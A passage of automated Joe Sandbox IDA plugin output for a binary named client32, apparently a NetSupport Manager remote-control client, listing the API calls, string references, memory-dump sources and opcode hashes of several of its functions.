                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2229609774-1557312927
                                                        • Opcode ID: 1b926b9716b0b64936cb5e1a2271b180302512e4999b4c0638f729702118aa4d
                                                        • Instruction ID: 1d7125962cf813140b05ce340ba898871e4843448dff8cc316c5671598320007
                                                        • Opcode Fuzzy Hash: 1b926b9716b0b64936cb5e1a2271b180302512e4999b4c0638f729702118aa4d
                                                        • Instruction Fuzzy Hash: EEE04F7AA00315AFC215DA95D840E96F3A9AB58314F00C419ED5547740D775E940CBA1
                                                        APIs
                                                        • ShowWindow.USER32(?,?), ref: 1100113B
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001121
                                                        • m_hWnd, xrefs: 11001126
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 1604732272-1557312927
                                                        • Opcode ID: 578e6b42e3a466468ed5f8b48cc10b3d5d2de952ef15857138e468b3388b4fb8
                                                        • Instruction ID: 76fc1c9f204d61b598545802c88e505d5d1a1f0333807163ca50a8fc43eda729
                                                        • Opcode Fuzzy Hash: 578e6b42e3a466468ed5f8b48cc10b3d5d2de952ef15857138e468b3388b4fb8
                                                        • Instruction Fuzzy Hash: 46D02E76A10328BFC2289A42EC01EC2F3ECAB143A8F008029FA1443240D671E840CBA1
                                                        APIs
                                                        • KillTimer.USER32(?,?), ref: 1100102B
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001011
                                                        • m_hWnd, xrefs: 11001016
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2229609774-1557312927
                                                        • Opcode ID: 1770e36260f19dc7d9c9f2fc614e6a2aa219c11bc3183004388498927ffce4b8
                                                        • Instruction ID: 85a83e753ce2334310b605be9e6b37dc2aa326c5352e60b6a277888e17089f80
                                                        • Opcode Fuzzy Hash: 1770e36260f19dc7d9c9f2fc614e6a2aa219c11bc3183004388498927ffce4b8
                                                        • Instruction Fuzzy Hash: A7D05E77A10329BFD225DA56EC45ED6F3DDEB18368F00C429FA4557640D7B1E880CBA2
                                                        APIs
                                                        • FindWindowA.USER32(NSMClassList,00000000), ref: 1103B00F
                                                        • SendMessageA.USER32(00000000,0000065B,?,?), ref: 1103B027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FindMessageSendWindow
                                                        • String ID: NSMClassList
                                                        • API String ID: 1741975844-2474587545
                                                        • Opcode ID: 0c65c2155593c244e98b49570bad4efc5dd94f5243094f64a045e500cd371313
                                                        • Instruction ID: 412497618096f6ceebb2c8e5b1c93f20f04941736e5984ac9c6eab23f84d4a3b
                                                        • Opcode Fuzzy Hash: 0c65c2155593c244e98b49570bad4efc5dd94f5243094f64a045e500cd371313
                                                        • Instruction Fuzzy Hash: 4ED01232200624BBE6109B95DD49FA7FB9CEB89B55F058055F6199A180C661D40087A0
                                                        APIs
                                                        • GetVersion.KERNEL32(1100D71E,?,00000000,?,1100CA4A,?), ref: 1100D4A9
                                                        • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CA4A,?), ref: 1100D4B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoadVersion
                                                        • String ID: AudioCapture.dll
                                                        • API String ID: 3209957514-2642820777
                                                        • Opcode ID: e67a74e394a46cd4a230a294111d6738ecbe5b9cda1371316a140dce9fca34bc
                                                        • Instruction ID: 25e691207691642c4356b8f3de2543ca62ce68b30f69e8b4a8df66a417ae823a
                                                        • Opcode Fuzzy Hash: e67a74e394a46cd4a230a294111d6738ecbe5b9cda1371316a140dce9fca34bc
                                                        • Instruction Fuzzy Hash: 82E01735E215639BF7028B3A888838DB3D1B74128AFC694B0EC26C0948FB28D4409F31
                                                        APIs
                                                        • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000000,1104FCA6,00000041,00000040,00000001,0000004F,_debug,platformid,00000000), ref: 110150D7
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,1116F448,000000FF,?,1105018C), ref: 110150E8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateFileHandle
                                                        • String ID: \\.\NSWFPDrv
                                                        • API String ID: 3498533004-85019792
                                                        • Opcode ID: 6231527e6390726173594491354c6e4cd092e0601a9bcb34ddaadc10646ea3e9
                                                        • Instruction ID: 75e221cb1509f29626dfc12a380aed5e2f5bc3ba1cdec89b9f211e34a1aec4b9
                                                        • Opcode Fuzzy Hash: 6231527e6390726173594491354c6e4cd092e0601a9bcb34ddaadc10646ea3e9
                                                        • Instruction Fuzzy Hash: F3D0C972A020347EE27116AAAC4CFCBBE09DB037B5F294264FA2EE55C4A6544C4186F0
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(111D89EC,00000000,?,?,1100C13B,00000000,00000000), ref: 1100D77F
                                                        • LeaveCriticalSection.KERNEL32(111D89EC,?,?,1100C13B,00000000,00000000), ref: 1100D7F0
                                                          • Part of subcall function 1100D6E0: EnterCriticalSection.KERNEL32(111D89EC,1100CA4A,?,1100B4AC,?,00000000,?,1100CA4A,?), ref: 1100D6E9
                                                          • Part of subcall function 1100D6E0: LeaveCriticalSection.KERNEL32(111D89EC,1100B4AC,?,00000000,?,1100CA4A,?), ref: 1100D761
                                                        • LeaveCriticalSection.KERNEL32(111D89EC), ref: 1100D7BF
                                                        • LeaveCriticalSection.KERNEL32(111D89EC), ref: 1100D7DB
                                                          • Part of subcall function 1100D690: EnterCriticalSection.KERNEL32(111D89EC,1100C3CB), ref: 1100D695
                                                          • Part of subcall function 1100D690: LeaveCriticalSection.KERNEL32(111D89EC), ref: 1100D6CF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$Enter
                                                        • String ID:
                                                        • API String ID: 2978645861-0
                                                        • Opcode ID: aca24964a8334ab7ee8cd89ad2ace1eb3ed66267a62d89fe4e8a6cc7f4fed172
                                                        • Instruction ID: 0dafe6cd7310c593e9f50b724afca6883deab30faa1009faaa9d0ca0fe2b91f1
                                                        • Opcode Fuzzy Hash: aca24964a8334ab7ee8cd89ad2ace1eb3ed66267a62d89fe4e8a6cc7f4fed172
                                                        • Instruction Fuzzy Hash: FC01A736F122246BDB01DFE5AC49A9DFB9CEB4A699B0441A5FC4DD3600F631AD0087F2